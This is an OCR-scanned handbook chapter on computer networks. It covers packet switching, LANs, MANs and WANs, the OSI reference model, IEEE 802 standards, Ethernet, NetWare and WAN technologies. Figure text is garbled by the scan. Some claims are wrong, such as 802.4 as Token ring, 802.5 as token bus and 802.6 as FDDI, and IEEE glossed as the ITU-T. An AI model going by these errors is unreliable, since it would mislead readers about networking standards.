29 Computer Networks: LANs, MANS, 
WANs, and Wireless* 

HURA GURDEEP 


INTRODUCTION 

The development and proliferation of Control Program for 
Microcomputers (CP/M)-based personal computers from 
the late 1970s and Microsoft Disk Operating System (DOS)- 
based personal computers in 1981 helped in creating a sin- 
gle site that may support a large number of computers. The 
CP/M is also known as Control Program for Microprocessor 
or Monitor and became the first operating system for per- 
sonal computers. The DOS was written for X86 micropro- 
cessors-based PCs. The initial attraction of networking these 
was mainly to provide sharing for disk space and laser print- 
ers, which were both very expensive at the time. There was 
much enthusiasm for the concept and for several years, from 
about 1983 onward, computer industry professionals would 
regularly declare the coming year to be “the year of the local 
area network (LAN).” 

Computer networks that transmit data using digital sig- 
nals often are an integral part of organizations for data acqui- 
sition or process control or data analysis solution. A basic 
understanding of the network technologies that are available 
for various applications is required to make the best imple- 
mentation decisions as the decision can have a profound 
effect on the ability to adapt to ever-changing technologies 
in the organizations, for example, the type of network(s) or 
network products selected for a data acquisition application 
can greatly affect cost/benefit evaluations for future proj- 
ects. Network technologies come in a bewildering array of 
options, and certain segments of this technology are chang- 
ing at an incredible rate. 

A well-designed, integrated solution to data transmis- 
sion and transmission media, appropriate for networks will 
yield a competitive advantage to any industrial enterprise 
computing and networking infrastructures. Users in all 
aspects of a business should be able to obtain organization 
and business data from any physical node, local or remote, 
using a number of existing network products like bridg- 
ing, routing, and media conversion technologies that link 
local area, wide area, industrial, and enterprise networks 
together and with Internet and wireless technologies, data 


transmission over large geographic areas is increasingly 
feasible. 


COMPUTER NETWORKS 

The computer network may be defined as a set of autono- 
mous computers interconnected together for exchanging of 
data. The connection may be defined by different transmis- 
sion media, for example, wires, coaxial cables, fiber optics, 
microwaves, satellite link, laser, etc. It encompasses both 
transmission media and communication software. A com- 
puter network also can be defined as network architecture 
with associated protocols for different topologies, different 
access techniques, and offers various applications. Various 
network activities are defined in terms of hierarchy of layers 
with each layer performing specific functions. Further, the 
system architecture conforming to the standards should be 
able to communicate with each other. The network is used 
to provide connectivity, high reliability, powerful commu- 
nication medium, and cost saving for sharing of expensive 
resources. The connectivity usually corresponds to the situa- 
tion of providing users access to information and processing 
power that are situated at a distance apart. 

Packet-Switched Networks 

At an abstract level, computer network can be considered as 
a system that deals with connectivity, end-to-end commu- 
nication, packet delivery, and associated services between 
two computers/hosts connected by networks. The switching 
system used in packet-switched networks receives the data 
packet from the source node and looks for a free transmission 
link between them and the switching element which helps in 
getting the data packet to destination. If it finds a free link, it 
will forward the data packet onto it; otherwise, it will store 
the data packet on its memory and try other routes for it. It 
will send the data packet to another switching element which 
will again look for the free link until the data are delivered 
to the destination. It is based on store- and- forward concept. 


* Specific information on wireless systems can be found in Chapter 16 and other chapters in this book. 


465 


© 2012 by Bela Liptak 



466 Networks , Security, and Protection 


The switching system has been named as interface message 
processor (IMP), or packet-switch mode, intermediate sys- 
tem, and data exchange system (DES). The system provides 
an interface between hosts and communication systems and 
establishes a logic connection between hosts over transmis- 
sion links. The packet switching is fast and appropriate for 
computer networks as it operates over many different types 
of networks. The forwarding of the data packet from one host 
to another represents a hop. Each host has routing informa- 
tion (containing a snapshot of the network topology) that it 
builds and updates by communicating with other hosts. The 
host uses this routing information in an attempt to choose 
the best route for sending the data packet toward its desired 
destination. There are usually many alternative routes to the 
destination which enables the data packet to be routed around 
communication links or hosts that are out of service due to 
failure, attacks, or maintenance. The packet-switching con- 
cept used in all networks allows the network to be robust in 
the face of failure, attack, or maintenance. Some of the mate- 
rials presented here have been derived from Refs. [1-3, 5,7], 
Reference [3] is website of Microsoft Corporation that has 
a link for Networking and Access Technology that provides 
information regarding its support for the widely adopted 
Institute of Electrical and Electronics Engineers (IEEE) 
802.11 standards. 

Configurations of Communication Services 

Each host is connected to one or sometimes more than one 
IMPs. All of the data packets originating from a source host 
first arrives at one of these connected IMPs from where it is 
delivered to the destination host through intermediate IMPs. 
The IMPs of a network may be connected by lines, cables, 
microwave links, satellite links, leased telephone lines, etc. 
All of these methods find applications in process control net- 
works. Based on the topology of the subnet, three types of 
configuration of communication services (offered by IMPs to 
the users) can be implemented as 

1. Point-to-point communications 

2. Multicast communications 

3. Broadcast communications 

Point-to-Point Communications 

In a point-to-point communication, the data packet from 
one host is transmitted over either a direct or indirect link 
between IMPs (to which these hosts are connected). In a 
direct link, IMPs are directly connected via a physical com- 
munication medium during transfer of the data packet. In 
the indirect link, the data packet is transferred over inter- 
mediate IMPs until it reaches the destination host IMPs and 
at each intermediate IMP, the data packet is stored and for- 
warded to next available IMPs and this process is repeated 
until the data packet is received by destination host. In this 
configuration, one of the main aims is always to minimize 
the number of hops between hosts. A hop defines a simple 


path of length of one between two nodes, and two hops 
define a simple path of length of two, and so on. 

Multicasting Communication 

In a multicasting communication, the data packet can be 
sent to users of a selected group. There exists only one chan- 
nel or circuit which can be shared by all connected user (of 
the selected group) hosts/IMPs. This type of communica- 
tion suffers from the problem of contention. The problem of 
contention can be resolved either by using a centralized dedi- 
cated processor, which decides as to which host can send the 
data next or by using a distributed system where each IMP 
resolves the problem independently. This obviously requires 
a complex protocol at each IMP. 

Broadcasting Communication 

A more general form of multicasting communication is 
broadcasting communication, where a data packet is deliv- 
ered to all hosts/IMPs connected to the network. The data 
packet is sent on the network circuit which is received by 
every host/IMP connected to it. If the address of any con- 
nected host/IMP matches with the address contained in the 
data packet, it can copy it into its buffer. 

CLASSES OF COMPUTER NETWORKS 

The distance typically classifies the type of networks being 
defined as local area networks (LANs), metropolitan area 
networks (MANs), and wide area networks (WANs). Some of 
the materials presented here have been derived from Ref. [2], 

Local Area Network 

A LAN is a group of computers and associated devices that 
share a common communications media albeit wired or wire- 
less. LANs are computer networks ranging in size from a few 
computers in a single office to hundreds or even thousands of 
devices spread across several buildings. Typically, connected 
devices share the resources of a single processor or server 
within a small geographic area, for example, within a pro- 
cess environment. They function to link computers together 
and provide shared access to printers, file servers, and other 
services. Usually, the server has applications and data stor- 
age that are shared in common by multiple computer users. 
A LAN may serve as few as two or three users or as many 
as thousands of users, for example, in fiber-distributed data 
interface (FDDI) networks. 

LANs defined for a small distance, usually in the range of 
1-4, are privately owned networks within a single building or 
campus of up to a few miles in size. They are widely used to 
connect personal computers, laptops, personal digital assis- 
tants (PDAs), and other mobile devices, workstations, periph- 
eral devices in company offices, educational institutions, and 


© 2012 by Bela Liptak 



29 Computer Networks: LANs, MANs, WANs, and Wireless 467 


factories for exchange of information, files, and documents 
and resources such as printers, memory, etc. LANs are char- 
acterized by a number of technologies like network access 
technology, topology, broadcast communication, common 
channel, transmission media (wired or wireless) technology, 
physical size, layered model for architecture, and protocols. 
The protocols are the rules and encoding specifications for 
sending data. They also determine whether the network uses 
a peer-to-peer or client/server architecture. 

LANs, in turn, may be plugged into larger networks, such 
as larger LANs or WANs, connecting many computers within 
an organization to each other and/or to the Internet. Because 
the technologies used to build LANs are extremely diverse, it 
is impossible to describe them except in the most general way. 
Universal components consist of the physical media that con- 
nect devices, interfaces on the individual devices that connect 
to the media, protocols that transmit data across the network, 
and software that negotiates, interprets, and administers the 
network and its services. Many LANs also include signal 
repeaters and bridges or routers, especially if they are large or 
connect to other networks. The level of management required 
to run a LAN depends on the type, configuration, and number 
of devices involved. In some cases it can be considerable. 

Metropolitan Area Network 

MANs are used for a distance of about 100 miles (within 
a metropolitan city area) while WANs cover a distance of 
thousands of miles. The expensive resources that are shared 
among the users include information processing devices such 
as computers, printers, and file servers, and interconnection 
bandwidths. For each new application, appropriate servers 
are being shared by users over the networks. Another exam- 
ple of sharing can be found in multimedia applications as the 
multimedia server is being shared by a number of users to 
access over the networks. 

Wide Area Network 

WANs or Internet is a telecommunications network that con- 
nects a geographically diverse group of computers within a 
state, country, cities, or even across several states or coun- 
tries. WANs typically are connected by telephone lines, other 
types of communication lines, or radio waves. A WAN is a 
computer network that covers a broad area whose communi- 
cations links cross metropolitan, regional, or national bound- 
aries. This is in contrast with PANs, LANs, campus area 
networks (CANs), or MANs, which are usually limited to a 
room, building, campus or specific metropolitan area respec- 
tively. WANs are also structurally similar to MANs but they 
provide communications links for distances greater than 50 
miles. A physical or logical network provides data commu- 
nications to a larger number of independent users than are 
usually served by a LAN and is usually spread over a larger 
geographic area. The largest and most well-known example 
of a WAN is the Internet. 


LOCAL AREA NETWORK STANDARDIZATION 

Looking at this new trend of defining LANs by different 
organizations as their standards, it was felt that these LANs 
had to be standardized by an appropriate international stan- 
dards organization. The international standards organiza- 
tion IEEE formed a committee known as IEEE 802, with 
a goal to define standards for all these LANs and also pro- 
vide interoperability among them. Since each of the LANs 
was defined for a specific environment and application, their 
architectures were different. In order to avoid any technical 
and integration problems, a standard for each of the LANs 
was defined and assigned with a specific number by IEEE 
802 committee. The standards defined for each of the LANs 
were based on the Open System Interconnection-Reference 
Model (OSI-RM). 

During the late 1980s, the U.S. Government OSI 
User Committee (USGOSIUC) was formed by the U.S. 
Government with an objective to provide OSI-related stan- 
dards on the world market. The committee offers OSI require- 
ments, specifications, and also coordinates with government 
agencies and industries who are working for OSI-based 
standards. All these organizations are working for com- 
mon objectives: to provide OSI-based standards, widespread 
development products and protocols for OSI-RMs, interop- 
erability between various OSI-based incompatible products, 
LANs, and non-OSI-based LANs. Standard LANs include 
IEEE 802.3 (Ethernet), IEEE 802.4 (Token ring), IEEE 
802.5 (token bus), and IEEE 802.6 (FDDI), and nonstandard 
LANs include IBM’s Systems Network Architecture (SNA), 
DECs DNA, and DECnet. 

All these LANs proposed as individual standards are 
based on OSI-RM in one way or the other. For each of the 
LANs, protocols are different for different layers and are col- 
lectively known as “set of protocols.” The only difference 
between the types of LANs lies in their lower layers, but still 
these networks can communicate with each other in the same 
way as two similar networks via gateways, bridges, routers. 
Protocol defines rules, procedures, and conventions used for 
data communication between peer processes. It provides data 
formatting, various signal levels for data and control signals, 
error control, synchronization and appropriate sequencing 
for the data to be exchanged 

LAN ARCHITECTURE: OPEN SYSTEM 
INTERCONNECTION-REFERENCE MODEL 

The International Standard Organization defined a reference 
model known as the OSI-RM for LANs. It does not define any 
services or protocols for OSI but instead provides a frame- 
work for coordinating the development of various standards 
for interconnecting different systems. According to OSI, a 
system is defined as a collection of computers with their asso- 
ciated software and attached peripheral devices so that the 
information can be transferred across its connected devices. 


© 2012 by Bela Liptak 



468 Networks, Security, and Protection 


Application 


application programs 


Application 






Data formatting 



Predentation 



Presentation 



* 



Session 



Session 




Session 



1 



Addressing and 
segmentation 



Transport 



Transport 



1 



Routing 



Network 

* 

1 

Network 






Error control 



Data link 




Data link 






Encoding 



Physical 



Physical 





FIG. 29.1 

OSI reference model. 

The aim of OSI-RM is to define a platform for different 
vendors that conforms to the reference model and associated 
standards so the devices from different vendors can commu- 
nicate with each other over the network. The OSI-RM archi- 
tecture is defined in terms of seven layers where each layer 
performs a specific function(s). Each layer further offers a 
set of services to its higher layers. The information process- 
ing required for any application requires an element which 
is known as Application Process (AP). The implementation 
of each of the layer is shielded or hidden from its lower layer 
via abstraction mechanism and as such the implementation of 
entire networks provides a total transparency to all the users. 
Some of the materials presented here are derived from Book. 
For detailed discussions on these topics, please refer to Refs. 
[1,2,5]. 

The OSI-RM (Figure 29.1) comprises of layers and for 
each layer we have a specific set of functions and services. 
Each layer has its own element known as entity which inter- 
acts with the entity of its lower or higher layers. The peer 
entity is defined for the same layer of two network systems 
following the OSI standard. For each of the layers, we have a 
set of rules and procedures that are defined as Layer Protocol. 


The services offered by any layer through its entity to its 
higher layers are usually accessed at Service Access Point 
(SAP) or Sockets or Ports. Figure 29.2 shows the SAP for 
a physical layer and similar SAPss exist for each of the lay- 
ers above the physical layer and provides interface between 
layers. When a user’s request for any service is invoked at 
the highest layer, the data communication through the model 
takes the user’s request all the way to the lowest layer. Each 
layer adds its own control information and address with the 
message until it reaches the data link layer. This layer defines 
a frame by adding header and trailer around the packet that it 
receives from the network layer. 

On the receiving side, the frame goes all the way to the high- 
est layer application from the lowest physical layer in the same 
way as it traveled on the transmitting side but in the reverse 
direction. Each layer removes the header and control informa- 
tion from the frame when it sends the frame to its higher layer. 
This process is termed as Frame Reduction. In the following 
section, we describe the functions and services of each of the 
protocol layers of the OSI-RM in brief to get an idea of its total 
functionality and realize the advantages of layered approach for 
defining a model of computer network and protocols. The data 
flow in the OSI-model is shown in Figure 29.3. The following 
section describes the functions, services, and standards of each 
of the layers of the OSI model in brief. For details of these, 
readers are advised to refer to many books on the networks, 
such as Refs. [1,2,5,9,12]. 

Physical layer: Physical layer is mainly concerned with 
electrical, mechanical, procedural, and functional aspects of 
transmission media for information transmission and receiv- 
ing over the network. It specifies the details of connecting 
cables, processing of digital signals, interfaces to different 
media, etc. The most popular standard of this layer for digital 
network interface is X.21 (CCITT). Other standards for this 
layer include V.24 (CCITT) and RS-232 DCE/DTE interface 
(Electronics Industries Association, EIA). 

Data link layer: Data link layer is responsible for maintain- 
ing integrity of data information between two hosts/sites. The 
protocols of this layer provide error-recovery, error-detection, 
and error-correction to handle the errors caused by noisy 
media. Various standard protocols for data link layer which 
provide reliable channel and error-recovery are IBM’s BSC, 


Service access point (SAP) 



FIG. 29.2 

Communication link between physical layer entities. 


© 2012 by Bela Liptak 


29 Computer Networks: LANs, MANs, WANs, and Wireless 469 



Source Destination 


T 


Host 


Communication 

subnet 


± 


FIG. 29.3 

Dataflow through OSI reference model. 

Synchronous Data Link Control (SDLC), ISO’s High-level 
Data Link Control (HDLC), Link Access Protocol-Balanced 
(LAP-B): CCITT’s version of HDLC. 

Network layer: Network layer provides communication 
between the user’s PC and Public or Private Networks. It 
defines addressing and routing (logical link) between source 
and destination sites. It also provides internet work routing 
between two remote sites. X.25 is a standard for this and 
other proprietary networks providing an equivalent layer to 
this layer include IBM’s SNA and DEC’S DNA. 

Transport layer: Transport layer offers network-independent 
service to higher layers and hides all details regarding the 
network being used for transmission. 

Session layer: The session layer provides a session for data 
communication between two applications processes. It also 
supports the synchronization between sites and defines check 
points from where diagnostic tests can be performed in the 
event of a failure. 

Presentation layer: The presentation layer represents the data 
information in appropriate form to be acceptable to the lower 
layers of the network. Two standard representation schemes 
for character representation are ASCII and EBCDIC and 
these are usually supported by most of the networks. All the 
application entities of the application layer are also translated 
or mapped into suitable entities by this layer. 

Application layer: Application layer provides an interface 
between application entities and user’s computer. This layer 
offers services to a variety of aspects of data communication 
between user’s computer and application entities including 
Terminal handling. File handling. Text interchange, Job trans- 
fer, and manipulation. For each of these aspects, a number of 


standards have been defined and a collection of these standards 
is known as Specific Application Service Elements (SASE). 
Within each of these aspects of application, quite a number of 
standards have been defined and are still continuously being 
defined to cater to different upcoming applications from vari- 
ous technologies. For example, a large number of terminal 
handling standards have been defined, like basic class, form, 
graphics, images, etc. The data flow through OSI-reference. 

Protocols: Interfacing in LAN Layer 

Protocol defines rules, procedures, and conventions used for 
data communication between peer processes. It provides data 
formatting, various signal levels for data and control signals, 
error control, synchronization and appropriate sequencing 
for the data to be exchanged. Two networks will offer a two 
way communication for any specific application(s) if they 
have the same protocols. The layer m is known as service 
provider for the layer m + 1 and offers the services at SAP. 
The following is a list of functions of protocol: 

Functions of protocols: The functions provided by a set of 
protocols in the OSI model are: 

• Establishes communication between users. 

• Provides sharing of computing and media resources 
via control and data packets and other facilities using 
multiplexing. The control packets are mainly to man- 
age the connection and ensure the correctness of data 
transfer across the network. 

• Supports serial communication, that is, multiple com- 
munication transfer over a single channel. 

• Supports point-to-point, multi-point connection, and 
broadcast configurations. 


© 2012 by Bela Liptak 




















470 Networks, Security, and Protection 


• Supports leased-line (dedicated) and public-switched 
connections. 

• Supports orderly interleaving of control and data 
packets. 

• Provides error-free communication between users in 
the presence of inherent node errors introduced during 
the transmission. 

• Provides data integrity. 

As indicated above, the LAN covers a small physical area. 
ARCNET, Token Ring, and many other technologies have been 
used in the past, but Ethernet over twisted pair cabling, and 
Wi-Fi LANs are the two most common technologies currently 
in use. LANs in turn may be plugged into larger networks, 
such as larger LANs or WANs, connecting many computers 
within an organization to each other and/or to the Internet. 

Layered Protocol Configurations 

The different categories of configurations for layered proto- 
cols have been defined and discussed in the following: 

Point-to-point (non- switched): This configuration is defined 
by a dedicated line or a private leased line. The protocol for 
this configuration defines one node as a controller perform- 
ing various operations for data transfer across the line while 
other nodes interact with each other on the basis of point- 
to-point connection or communication. The configuration is 
based on star topology and as such this configuration is also 
known as star-type network. 

Point-to-point (switched): In this configuration, the connec- 
tion is established via dial-up operation. The protocol defines 
the procedures for connection establishment, data transfer, 
and connection de-establishment/termination phases. It uses 
a device known as automatic calling units (ACUs). Any sta- 
tion can make a request at any time and the protocol must 
resolve the contention problem. 

Multi-point (non-switched): This configuration is also 
known as multi-drop system. Here, a communication chan- 
nel is shared among users and all the users receive a message 
transmitted on the channel. Typically, one station controls all 
these operations and it also resolves the contention problem. 

Multi-point (switched): This configuration is different from 
multi-point (non-switched) in the sense that users have to 
make an initial request for sending a message. Different 
phases for sending messages across the channel are handled 
by appropriate protocols and sets of procedures. 

Figure 29.4 shows the step-by-step various processes that 
have been implemented in appropriate protocols that forward 
the packet from one network, say A, to another network, say B. 

LAN Topology and Connectivity 

LANs may use a number of transmission media like a cable, 
fiber optics, twisted pair of wires, and many others. Traditional 


LANs run at speeds of 10-100 Mbps, have low delay and 
make very few errors. Newer LANs operate at up to 10 Gbps. 

There are a number of topologies for LANs but out of 
those topologies, two topologies that support broadcast com- 
munication are bus and ring LANs. 

Bus LAN: All computers or peripheral devices are connected 
to a linear cable where only one connected computer can 
transmit the data over the bus as shown in Figure 29.5. A col- 
lision will occur if more than one computer tries to transmit 
simultaneously. The arbitration mechanism to avoid collision 
may be centralized or distributed. IEEE 802.3, popularly 
called Ethernet, for example, is a bus-based broadcast net- 
work with decentralized control, usually operating at 10 Mbps 
to 10 Gbps. Computers on an Ethernet can transmit whenever 
they want to; if two or more packets collide, each computer 
just waits for a random time period and tries again later. 

Ring LAN: In a ring LAN, a physical ring comprises of 
repeaters and each of the computers is connected to one 
repeater (Figure 29.6). One bit can go through the repeater 
and propagates around the ring topology. Typically, each bit 
circumnavigates the entire ring in the time it takes to trans- 
mit a few bits, often before the complete packet has even been 
transmitted. IEEE 802.5 (the IBM token ring), is a ring-based 
LAN operating at 4-16 Mbps and FDDI is another example 
of a ring network. 

Typically, a suite of application programs can be kept on 
the LAN server. Users who need an application frequently 
can download it once and then run it from their local hard 
disk. Users can order printing and other services as needed 
through applications run on the LAN server. A user can share 
files with others at the LAN server; read and write access 
is maintained by a LAN administrator. A LAN server may 
also be used as a web server if safeguards are taken to secure 
internal applications and data from outside access. 

Loop system: This configuration uses a ring topology where 
the data is moving from one station to another over the ring 
(physical link). It requires nodes on the ring to include sets of 
protocols which resolve various issues during the data com- 
munication over the ring. This configuration may define both 
centralized and distributed categories of protocols. 

It is interesting to know that IEEE 802 model of LAN has 
eight layers instead of seven layers as defined by OSI-RM. 
The Data link layer of OSI-RM is further partitioned into 
two sub layers as Logical Link Control and Media Access 
Control (MAC), as shown in Table 29.1. 

Ethernet is by far the most commonly used LAN tech- 
nology. A number of corporations use the Token Ring 
technology. FDDI is sometimes used as a backbone LAN 
interconnecting Ethernet or Token Ring LANs. Another 
LAN technology, ARCNET, once the most commonly 
installed LAN technology, is still used in the industrial auto- 
mation industry. The Ethernet LAN is considered as the LAN 
of choice for many engineering graphics and high-demand 
applications and offers the following advantages: simplicity 


© 2012 by Bela Liptak 


29 Computer Networks: LANs, MANs, WANs, and Wireless 471 



FIG. 29.4 

Flow of Packet from one network to another network. 


and reliability, low cost of installation, compatibility, ease of 
maintenance, support of interconnections between PCs to 
hosts, PCs to PCs, hosts to hosts, etc., uses approved LAN 
standards (ISO, IEEE, EMCA), provides support for back- 
bone and Broadband LANs, and others. A typical Ethernet 
diagram is shown in Figure 29.7. 

Ethernet is available in three versions: Standard Ethernet, 
ThinNet, and Twisted pair Ethernet. The standard Ethernet 
and ThinNet are coaxial cable-based LANs while twisted 
pair Ethernet uses hierarchical star topology using con- 
centrator bus configuration. The standard Ethernet is more 
expensive and difficult to install than ThinNet but it offers 
larger distance coverage for large number of users. Ethernet 


is based on 10 BASE T specifications, which allow the use 
of two pairs of existing pair drop cable wiring for LANs and 
is based on star or hub topology. Other cable media are also 
supported in the standards documents like 10 BASE 2 uses 
thin wire coaxial cable with a maximum segment length of 
200 m, 10 BASE 5 uses thick wire with a maximum segment 
length of 500 m, 10 BASE F uses optical fiber drop cables 
and is based on star topology (similar to 10 BASE T). 

NetWare Operating System 

NetWare is a Network Operating System (NOS) that provides 
transparent remote file access and numerous other distributed 


© 2012 by Bela Liptak 


472 Networks, Security, and Protection 


Computer 

/ 



Work station Printer 


FIG. 29.5 

Bus LAN. 



FIG. 29.6 

Ring LAN. 


TABLE 29.1 

A Comparison of the OSI 
and IEEE 802 Models 

OSI 

IEEE 802 Model 

Application 

Application 

Persentaion 

Persentaion 

Session 

Session 

Transport 

Transport 

Network 

Network 

Data link 

LLC 


MAC 

Physical 

Physical 


network services, including printer sharing and support for 
various applications such as electronic mail (e-mail) trans- 
fer and database access. It specifies the upper five layers of 
the OSI reference model and as such, runs on virtually any 
media-access protocol, Layer 2. Additionally, it also runs on 
virtually any kind of computer system, from PCs to main- 
frames. This chapter summarizes the principal communica- 
tions protocols that support NetWare. 


NetWare was developed by Novell, Inc., and introduced 
in the early 1980s. It was derived from Xerox Network 
Systems (XNS), which was created by Xerox Corporation in 
the late 1970s, and is based on the client-server architecture. 
Clients request services, such as hie and printer access, from 
servers. 

NetWare’s client-server architecture supports remote 
access that is transparent to users through remote procedure 
calls. A remote procedure call begins when the local com- 
puter program running on the client sends a procedure call 
to the remote server. The server then executes the remote 
procedure call and returns the requested information to the 
local client. Figure 29.8 illustrates the NetWare protocol 
suite and the relationship between the NetWare protocols 
and the OSI reference model [1,2,5,11], 

Internetwork Packet Exchange (IPX) is the original 
NetWare network-layer (Layer 3) protocol used to route pack- 
ets through an internetwork. IPX is a connectionless data- 
gram-based network protocol and, as such, is similar to the 
Internet Protocol found in Transmission Control Protocol/ 
Internet Protocol (TCP/IP) networks. 

METROPOLITAN AREA NETWORKS 

A MAN is a network for sharing regional resources to inter- 
connect computing resources and LANs using backbone 
technologies in a geographic area or region larger than that 
covered by even large LANs but smaller than the area cov- 
ered by a WANs. A MAN often provides efficient connec- 
tions to a WAN. It is also used to provide the interconnection 
of several LANs by bridging them with backbone lines defin- 
ing backbone networks. 

The backbone networks connecting different LANs 
within the campus has become very common and useful for 
campus network in most of the universities, big corporations, 
organizations, etc. Typically it covers a distance of 20-50 
miles and is generally owned by the organization and vari- 
ous communication links; equipments are generally owned 
by either a consortium of users or by Internet service pro- 
viders. Some of the examples where MANs have been used 
in metropolitan cities include: England, Poland, New York, 
Geneva, Lodz, Switzerland, and many other metropolitan 
cities around the world. Based on the success of MANs and 
the advent of wireless technology, wireless MANs have been 
installed in a number of areas. 

Some other technologies that have used MANs include 
Asynchronous Transfer Mode (ATM), Fiber Distributed 
Data Interface (FDDI), Distributed Queue Dual Bus (DQDB) 
defined in Institute of Electrical and Electronic Engineering 
IEEE 802.6, Ethernet at 10 Gbps (IEEE 802. 3ae), Gigabit 
Ethernet at 1000Mbps (IEEE 802. 3z, 802. 3ab), and Switched 
Multimegabit Data Service (SMDS). It provides MAN links 
with LAN at physical layers using fiber-optic cables and 
wireless technologies such as microwave or radio. MAN 
protocols are mainly at the data link layer of OSI model as 


© 2012 by Bela Liptak 


29 Computer Networks: LANs, MANs, WANs, and Wireless 473 


Department 1 


Department 2 


Department 3 


■ 

112.093.28.15 M 

112.093.28.16 

112.093.28.18 
1 1 7 093 78 1 9 


112.093.28.17 

i 

i Lz,.uy d.z.o .1 y 

112.093.28.20 


112.093.28.21 

112.093.28.22 

112.093.28.23 


Ethernet (112.093.2.8) 




Router-firewall 


121.125.130.06 


JM 


Department 

server 


& 


Printers 


121. 125.130.07 - dept.l 

121.125.130.08- dept.2 

121. 125. 130.09 - dept.3 


r 3 ^ 


Internet 


FIG. 29.7 

Typical Ethernet LAN. 



Applications 

NetWare 

core 

protocol 

(NCP) 

RPC-based 

application 

RPC 

LU 6.2 
support 

NetBIOS 

emulator 

NetWare 

shell 

(client) 


SPX 

IPX 


Ethernet/ 
IEEE 802.3 

Token 

Ring/IEEE 

FDDI 

ARCnet 

ppp 

802.5 





FIG. 29.8 

NetWare and OSI reference model. 


defined by IEEE (International Telecommunication Union — 
Telephones [ITU-T]), Internet Engineering Task Force 
(IETF), and others. 

WIDE AREA NETWORKS 

WANs first emerged in the mid-twentieth century with the 
advent of networks like ARPAnet. Developed in 1969 by the 
Department of Defense, ARPAnet and several other networks 
eventually evolved into the Internet, the largest WAN in the 
world. The packet switching technology most commonly 


used with WANs surfaced in the 1960s, and standard packet 
switching protocol, known as X.25, was developed in 1976. 
To increase network speed packet switching allows for the 
parceling of data into smaller chunks, known as packets, 
prior to transmission. These packets can travel independently 
via alternate routes, and they are reassembled once they reach 
their target. Although X.25 remained the most popular WAN 
packet switching protocol for years, other packet switching 
protocols used with increasing frequency by WAN develop- 
ers and administrators include the Internet standard, TCP/IP, 
and Frame Relay, used most often by WANs connected via 
high speed T1 and T3 lines. 


© 2012 by Bela Liptak 





474 Networks, Security, and Protection 


Some WANs bring together various types of communi- 
cations, such as data, video, and voice. Some organizations, 
including companies, universities, research centers, hospi- 
tals, and libraries, use WANs to connect to the Internet. The 
following section describes some of the popular applications 
of WANs. 

WANs are often used by larger corporations or orga- 
nizations to facilitate the exchange of information and in a 
wide variety of industries, and corporations with facilities at 
multiple locations have embraced WANs. Increasingly, how- 
ever, even small businesses are utilizing WANs as a way of 
increasing their communications capabilities. Many WANs 
are built for one particular organization and are private. They 
are commonly implemented in enterprise networking envi- 
ronments to link offices in different cities, states, countries 
and even continents. WANs are also built by Internet service 
providers (ISPs) to provide connections from the LANs of 
their customers to the Internet. 

The Internet, which is a world-wide network of intercon- 
nected computer networks, is a WAN, and thus it is the largest 
WAN in existence. A WAN consists of computers, networks, 
and other peripheral devices and runs a user’s applica- 
tions. These computers are usually known as hosts and are 


connected by communication subnets. Organizations or users 
may have their own hosts while the subnet is owned or oper- 
ated by telephone companies or ISPs. The main responsibility 
of the subnet is to forward the message from the source host 
to another host until it reaches the destination host. The users 
of WANs do not own the transmission media that connect the 
remote hosts and subnets but can get the similar services as 
that of LAN through WAN service providers. 

Applications of WANs 

The first application is being used in most of the educational 
campuses. A typical WAN diagram in any education campus 
is shown in Figure 29.9. Other applications are being used in 
most of the corporations. Some of the materials presented 
here have been derived from Refs. [1,2,8-10]. 

Reference [9] refers to Non-regulatory federal agency 
with the US Department of Commerce that provides technol- 
ogy, measurement and standards for products ranging from 
automated teller machines and atomic clocks to mammo- 
grams and semiconductors, innumerable products and ser- 
vices. The reference refers to the material presented in the 
link “Computer security”. 


¥ 



XX. iwn 

Om* 

kWh 1 

at umm* 



¥ 



4;> 

Vl 

Om» 

<n LMX / 

Cm U « .«»>! \ 

A 

f 

nm*i r 

'Muun 

\ 

\ 

\ 

' 1 jl > 
• 1 

WUMW 

<!L> 

> < 

mim 


FIG. 29.9 

Components of WAN. 


© 2012 by Bela Liptak 


29 Computer Networks: LANs, MANs, WANs, and Wireless 475 


WANs have been used in a number of applications, for 
example, Centralized merchant transactions, Remote appli- 
cation access (Citrix), remote user access, file transfer/ 
sharing, video delivery, secure access to internal software 
applications, outsourced network management, compliance 
requirement, central data storage and backup, VoIP service, 
and others. 

A corporation with many sites around the globe can use a 
WAN to form an intranet. Each of the individual site offices 
uses its own LANs for services like internal messaging, data 
processing functions, and hardware and software sharing. 
These LANs are joined together to form a WAN that offers 
the same services of data sharing and messaging capabilities 
across a much broader geographic area. 

Other business partners like suppliers or distributors may 
create a WAN as a means of establishing an extranet. The 
extranet provides an access to information like availability of 
product and its delivery time, and other associated informa- 
tion. Some WANs bring together various types of communi- 
cations, such as data, video, and voice. Some organizations, 
including companies, universities, research centers, hospitals, 
and libraries, use WANs to connect to the Internet [2,5,8,10], 

The world's most popular WAN is the Internet. Some 
segments of the Internet, like virtual private network (VPN)- 
based extranets, are also WANs in themselves. WANs gener- 
ally utilize different and much more expensive networking 
equipment than do LANs. Key technologies often found in 
WANs include Synchronous Optical Network (SONET), 
Frame Relay, and ATM. 

WAN-Based Technologies 

WAN has gone through a number of technological changes 
since its inception and as such a number of connection mech- 
anisms have been proposed in the literature. 

Following is a partial list of some of those advances 
and associated standards. Synchronous Optical Network/ 
Synchronous Digital Hierarchy (SONET/SDH), multi pro- 
tocol label switching (MPLS), ATM, and Frame relay are 
often used by service providers to deliver the links that are 


used in WANs. X.25 was an important early WAN protocol, 
and is often considered to be the core of Frame Relay as 
many of the underlying protocols and functions of X.25 are 
still in use today by Frame Relay. Some of the materials pre- 
sented here have been derived from Refs. [2,6,9,11]. 

Reference [6] referes to an international company that 
provides a single source of web and mail security, archiving, 
backup and fax, networking and security software and hosted 
IT solutions for small to medium-sized enterprises (SMEs). 

1. Telephone connections: It offers six types of 
connections 

a. Dial up 

b. Leased lines 

c. T Carrier lines 

d. T1 and T3 lines 

e. Integrated Services Digital Network (ISDN) 

f. Switched-56 

2. Multi protocol label switching: It uses the information 
of layer 2 like links, bandwidth, latency, and utiliza- 
tion for determining the routes either by IP within a 
particular autonomous system or by ISP for exchang- 
ing IP packets over the Internet. 

3. X.25: It specifies how to connect computer devices to 
public switching data networks. 

4. Frame relay: It uses frames of varying length and it 
operates at the data link layer of the OSI model. A per- 
manent virtual circuit (PVC) is established between 
two hosts on the network. 

5. Switched multi-megabit data service: It allows fixed 
length cell switching and offers data rates between 
1.533 and 45 Mbps. 

6. Asynchronous transfer mode: It supports transmission 
of audio, video, and data and uses a variety of media 
with both baseband and broadband systems. 

7. Synchronous optical network: It defines a physical 
